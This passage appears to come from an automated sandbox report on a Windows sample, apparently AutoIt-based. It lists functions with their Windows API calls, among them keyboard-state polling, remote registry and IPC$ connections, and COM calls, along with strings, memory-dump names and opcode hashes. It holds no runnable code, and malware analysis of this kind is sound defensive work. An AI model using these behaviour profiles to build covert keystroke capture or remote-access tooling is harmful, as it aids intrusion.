                                                                                                                                                                                                                                                                                                        • Instruction ID: 5d4203e971097a40694521bccdd47a3f13c3f3aed7868b0d54527b5b7c0f13d2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e52729594189e7f5ed884565d8d62b7d390f3ed611a64b84c61098a8252a17ed
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321F9B9504205AFE3326F64ECC8B2E7FA9F799B48B008014F9C58625DCB7F8854C755
                                                                                                                                                                                                                                                                                                        Function 0101F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0101F374
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0101F38A
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101F39B
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101F3AD
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101F3BE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                        • Opcode ID: c28a4655151641442b0819b235815adca53db6ee8a64033616829a4fa27e2153
                                                                                                                                                                                                                                                                                                        • Instruction ID: 76321b01f7c11ff5c1c4db2c5a7de97ac3e4611b16b0b0bfddce553b976ba64d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c28a4655151641442b0819b235815adca53db6ee8a64033616829a4fa27e2153
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4211A331A9125A79D720A367CC4AEFFBABCEBD6B80F00042E7441E6095DAA85905C9B5
                                                                                                                                                                                                                                                                                                        Function 0101A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101A9D9
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101AA44
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0101AA64
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 0101AA7B
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0101AAAA
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 0101AABB
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0101AAE7
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0101AAF5
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0101AB1E
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0101AB2C
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0101AB55
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 0101AB63
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ab482c0e13a22a29ebef1f855b91e3d72a58022e1631f862a7de67e5c3e62a3a
                                                                                                                                                                                                                                                                                                        • Instruction ID: e286dfc647d0ecbaec9864ea45a9c4939d049876680bf1d5b52d7e416adc0955
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab482c0e13a22a29ebef1f855b91e3d72a58022e1631f862a7de67e5c3e62a3a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5151E264B057C9A9FB31D7B88990BEABFF59F12240F0845D9C6C20B1C7DA6C968CC761
                                                                                                                                                                                                                                                                                                        Function 0101662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 01016649
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01016662
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 010166C0
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 010166D0
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 010166E2
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 01016736
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 01016744
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01016756
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 01016798
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 010167AB
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 010167C1
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 010167CE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7df2f77eef2165c708018046bdcd94a2e294c326988ef2789c275a28b96c7b4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d749a01d54ac55ccf26ea5fa3d9edea85ec96752c256d87530c8d58a997e316
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7df2f77eef2165c708018046bdcd94a2e294c326988ef2789c275a28b96c7b4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D65150B4B00205AFDF18CFA8DD99AAEBBB5FB58310F108168F549E7294E7B59D00CB50
                                                                                                                                                                                                                                                                                                        Function 00FB146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB1488,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB1865
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00FB1521
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB15BB
                                                                                                                                                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00FF29B4
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FF29E2
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FF29F9
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000), ref: 00FF2A15
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00FF2A27
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: debd7e90c50cb41a2869e992b7911d7b9ab78e323023936479a2cab83c43c330
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78ea7ab7a1659d3e55f3b5e6fefb4d130d7b5015f957806540f7b59de650ec4d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: debd7e90c50cb41a2869e992b7911d7b9ab78e323023936479a2cab83c43c330
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC61A631904705DFDB36DF16C998B6A77B1FF80322F944018E4C28B664C77AA891EF84
                                                                                                                                                                                                                                                                                                        Function 00FB2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB2234: GetWindowLongW.USER32(?,000000EB), ref: 00FB2242
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00FB2152
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 882903a87cf239ca239bae25e6b56d959b61aa0c0da30b21d873fe86fcb8ef48
                                                                                                                                                                                                                                                                                                        • Instruction ID: 11e5634b444e5e95d8e4ba3c4428fb6ed63c7f308aa8be21d88f406477a53913
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 882903a87cf239ca239bae25e6b56d959b61aa0c0da30b21d873fe86fcb8ef48
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41CE79600644AFDB305F7D9888BBD3B65AB56330F144245FAE29B2E5C7368D42EB10
                                                                                                                                                                                                                                                                                                        Function 0101A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,01000D31,00000001,0000138C,00000001,00000000,00000001,?,0102EEAE,01082430), ref: 0101A091
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,01000D31,00000001), ref: 0101A09A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,01000D31,00000001,0000138C,00000001,00000000,00000001,?,0102EEAE,01082430,?), ref: 0101A0BC
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,01000D31,00000001), ref: 0101A0BF
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101A1E0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                        • Opcode ID: 039f5098746f0eeea4f03c39a60266240c0c441e11e314af0bca88b38fb7cdbf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9ab83dcf99cee7ec7fa8a5d8fa03607ad94a76862499cc25c12d7efbcb100c63
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 039f5098746f0eeea4f03c39a60266240c0c441e11e314af0bca88b38fb7cdbf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01416C7290020DAACB11FBE1DD86EEEB778AF58340F104065B641B6096EB7D6F09DF61
                                                                                                                                                                                                                                                                                                        Function 01010FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 01011093
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010110AF
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010110CB
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 010110F5
                                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0101111D
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01011128
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101112D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9a35c9c3e4576b5785beae7a1272fc3933ee90acf12f6ba5150128297943524d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 76d91ac8155f50e515d29b9ab511a067888119cc1c1567834cd56e1137637776
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a35c9c3e4576b5785beae7a1272fc3933ee90acf12f6ba5150128297943524d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46413876D00229ABDF25EBA5DC85DEEB7B8BF08740F004069F941A3161EB799E04DF50
                                                                                                                                                                                                                                                                                                        Function 01044A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01044AD9
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 01044AE0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01044AF3
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 01044AFB
                                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 01044B06
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 01044B10
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 01044B1A
                                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 01044B30
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 01044B3C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7f4b70d0245c284733accf744c9ea3250ee9917b527d5bdbce99b9199741b9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1412636121e53a6de4b4ccb246ad3e35ceb963cb80dacc89db89306e2640bb6d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7f4b70d0245c284733accf744c9ea3250ee9917b527d5bdbce99b9199741b9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D13181B5100215BBDF229FA4DD88FDA3BA9FF1D324F110221FA94E6190C77AD860DB94
                                                                                                                                                                                                                                                                                                        Function 0103468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 010346B9
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 010346E7
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 010346F1
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103478A
                                                                                                                                                                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0103480E
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 01034932
                                                                                                                                                                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0103496B
                                                                                                                                                                                                                                                                                                        • CoGetObject.OLE32(?,00000000,01050B64,?), ref: 0103498A
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0103499D
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01034A21
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01034A35
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08c071a33afa4200180766af11f7014ddbb63116af17277a2128455fe4a725b4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e14986a03c594a951ffe09b4667c803c1b998be1dbf5c6c848ab72827e57eb8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08c071a33afa4200180766af11f7014ddbb63116af17277a2128455fe4a725b4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C111B5608305AF9700DF68C88496BBBE9FF89748F00495DF98ADB250DB31ED46CB52
                                                                                                                                                                                                                                                                                                        Function 010284DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 01028538
                                                                                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 010285D4
                                                                                                                                                                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 010285E8
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CD4,00000000,00000001,01077E8C,?), ref: 01028634
